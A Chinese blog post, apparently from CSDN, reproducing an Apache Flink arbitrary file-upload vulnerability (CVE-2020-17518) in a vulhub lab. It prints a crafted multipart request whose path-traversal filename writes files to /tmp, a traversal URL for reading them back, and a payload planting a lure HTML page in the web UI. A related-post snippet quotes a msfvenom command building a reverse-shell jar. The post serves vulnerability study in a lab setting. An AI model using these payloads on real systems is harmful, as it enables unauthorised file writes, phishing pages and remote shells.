Apache Fink 文件上传漏洞复现及利用

已于 2022-07-28 20:03:19 修改
阅读量966 收藏
点赞数 4
文章标签: 网络安全 web安全
于 2022-07-28 20:00:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/126042037
版权

Apache Fink 文件上传漏洞复现

打开vulhub靶场,输入命令

cd flink/CVE-2020-17519
sudo docker-compose up -d
sudo docker-compose ps

登录靶场网页http://靶场IP:8081,然后在Submit New job处发现有上传点,f12查看网络数据包,然后上传任意文件

在这里插入图片描述随后可以看到网页POST一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容

在这里插入图片描述

boundary是分隔符,不用关注,查看到其fliname应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的 xxx/xxx/jars/upload/test.jar ,如果他没有在这个fliname处进行检查或者强制规定的路径,而是使用类似 touch xxx/xxx/jars/upload/test.jar 这样的直接创建文件的命令,我们可以通过修改fliname,令其命令达到类似 touch xxx/xxx/jars/upload/../../../../../../../tmp/test.jar 的效果,所以我们修改消息体内容为

Content-Type: application/octet-stream 是让文件默认为字节流,浏览器处理这种类型的文件默认是下载,我们要显示他,所以要把它删掉

-----------------------------160778796920884667481441541505
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../../tmp/test"

123456789
-----------------------------160778796920884667481441541505--

在这里插入图片描述

其它不修改,然后点击发送,因为该版本的 Apache Flink 中存在有一个目录穿越漏洞,详细内容在https://blog.csdn.net/Tauil/article/details/125930144,我们可以使用该漏洞查看我们创建的内容

输入URL:

http://靶机IP:8081/jobmanager/logs/…%252f…%252f…%252f…%252f…%252f…%252ftmp%252ftest

在这里插入图片描述

Apache Fink 文件上传漏洞利用

这时我们可以在Job Manager中发现该网页文件地址

在这里插入图片描述

网页图形界面一般为 xxx+xxx+ui 现在我们知道了他的命名格式是 flink-web-xxx ,所以猜测该网页文件地址应该是在 tmp/flink-web-2dd3149d-f348-4e1e-88ed-4ed72f05728b/flink-web-ui

修改数据包为

-----------------------------160778796920884667481441541505
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../../tmp/flink-web-2dd3149d-f348-4e1e-88ed-4ed72f05728b/flink-web-ui/win.html"

<h1>Congratulations</h1>
<a href="https://www.baidu.com">Click here to get one hundred dollers</a> 

-----------------------------160778796920884667481441541505--

在这里插入图片描述
发送后输入URL:http://靶机IP:8081/win.html 即可访问我们写入的网页

在这里插入图片描述

Tauil
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fink源码分析及项目流程描述
06-25
Fink源码分析, 收集不易 免费的,请关注点赞。 有能力的大爷请赏点
CVE-2020-17518 flink任意文件上传漏洞复现
qq_49279082的博客
02-08 2487
本人对CVE-2020-17518漏洞的理解
tomcat源码分析_CVE-2020-9484 tomcat session反序列化漏洞分析
weixin_39839162的博客
11-27 194
作者:N1gh5合天智汇title: CVE-2020-9484 tomcat session反序列化漏洞分析 tags: CVE,Tomcat,反序列化 grammar_cjkRuby: true本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介Apache To...
Apache Flink任意jar包上传漏洞(1.9.1最新版)
cainiao17441898的博客
07-18 518
环境: Cenos7,kali 准备: 安装Apache Flink包 运行程序 cd flink-1.9.1/bin/ , ./start-cluster.sh 生成反弹的shell,jar包。 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.238.128 LPORT=4444 -f jar > hack.jar 开始 打开localhost:8081并上传jar包 开启监听 msf6 > use exploit/multi/ha
Apache Flink 任意Jar包上传漏洞复现
潜心学安全的小白
11-15 891
目录漏洞背景漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议参考链接 漏洞背景 近日,有研究员公开了Apache Flink未授权上传jar包的安全风险,攻击者利用该隐患可在未经授权的情况下,上传包含恶意代码的jar包,从而控制目标服务器。 漏洞描述 Apache Flink是开源流处理框架,可用于对流数据进行分布式处理,在大数据领域中应用广泛。jar包上传属于Flink的正常业务功能,但是Fli...
Vulhub Apache Flink 文件上传漏洞复现
weixin_53696027的博客
07-26 210
关于Vulhub Apache Flink 文件上传漏洞复现
Apache Flink -任意文件写入漏洞复现(CVE-2020-17518)
0xSec
01-11 1339
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
Apache Flink RCE漏洞复现(任意 Jar 包上传)
Li-D的博客
08-31 2686
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
SmileAssassn的博客
01-08 430
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1611
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
fink-science-portal:芬克科学门户网站
03-25
在每个观察夜之后,数据将被汇总并推送到Apache HBase表中。 主表包含自2019年11月1日由芬克处理的所有警报数据。 这表示收集了超过6700万级的警报(3 TB),以及约2200万处理(1个TB)为01/2021。 主表中的数据沿所...
fink-alert-simulator:模拟Fink代理的警报流
04-16
芬克警报模拟器fink-alert-simulator是一个软件包,用于将警报数据注入Apache Kafka,以向侦听Kafka流的代理提供数据。 主要目的是测试代理并重播历史警报数据。 该软件包属于生态系统。安装派生和/或克隆存储库,并...
fink入门介绍,包括从批处理到流处理简介
02-07
fink入门介绍思维导图
fink:Fink包管理器
05-03
Fink自述文件 这是Fink,一个软件包管理系统,旨在将整个开放源代码软件引入Darwin和Mac OSX。 借助dpkg ,它可以维护单独的目录层次结构。 它会下载原始源代码发行版,并在必要时对其进行修补,为Darwin配置它们,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8198
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全之密码学技术
缘友一世的博客
04-29 1119
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全的重要性及人才需求
yj520400的博客
04-29 718
能从事政府部分的安全规范和安全管理,包括法律的制定,也能从事安全企业的安全产品的研发,还能从事一般企业的安全管理和安全防护,国与国之间的空间安全的协调。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。如果你把每周要学的内容精细化到这种程度,你还会担心学不会,入不了门吗,其实说到底就是学了两个月,但都是东学一下,西学一下,什么内容都是浅尝辄止,没有深入进去,所以才会有学了2个月,入不了门这种感受。因为漏洞是依赖于产品的,产品更新换代,漏洞也会更新换代。
网络安全常用术语解读 」SBOM主流格式CycloneDX详解
最新发布
网络安全
05-03 422
CycloneDX是软件供应链的现代标准。CycloneDX物料清单(BOM)可以表示软件、硬件、服务和其他类型资产的全栈库存。该规范由OWASP基金会发起并领导,由Ecma International标准化,并得到全球信息安全界的支持,如今CycloneDX已经是OWASP旗舰项目。
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 1520
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
macOS安装fink
05-13
Fink 是一个在 macOS 上安装和管理 Unix 软件包的工具。以下是安装 Fink 的步骤: 1. 打开终端应用程序。 2. 确保您的 macOS 系统已经安装了 Xcode Command Line Tools。如果您还没有安装它,请在终端中输入以下命令: ``` xcode-select --install ``` 3. 下载 Fink 安装程序。您可以从 Fink 官方网站(https://www.finkproject.org/download/index.php)下载最新版本的 Fink。 4. 打开下载的 Fink 安装程序,并按照提示进行安装。安装过程中需要输入管理员密码。 5. 安装完成后,在终端中输入以下命令初始化 Fink: ``` source /sw/bin/init.sh ``` 6. 然后使用以下命令更新 Fink: ``` fink selfupdate ``` 7. 现在,您可以使用 Fink 安装所需的软件包。例如,如果您想安装 Python,可以使用以下命令: ``` fink install python3 ``` 这将安装 Python 3.x 版本及其相关依赖项。 注意:Fink 的软件包是由社区维护的,可能与官方软件包存在差异。在安装软件包之前,请确保您已经了解了它的来源和可信度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值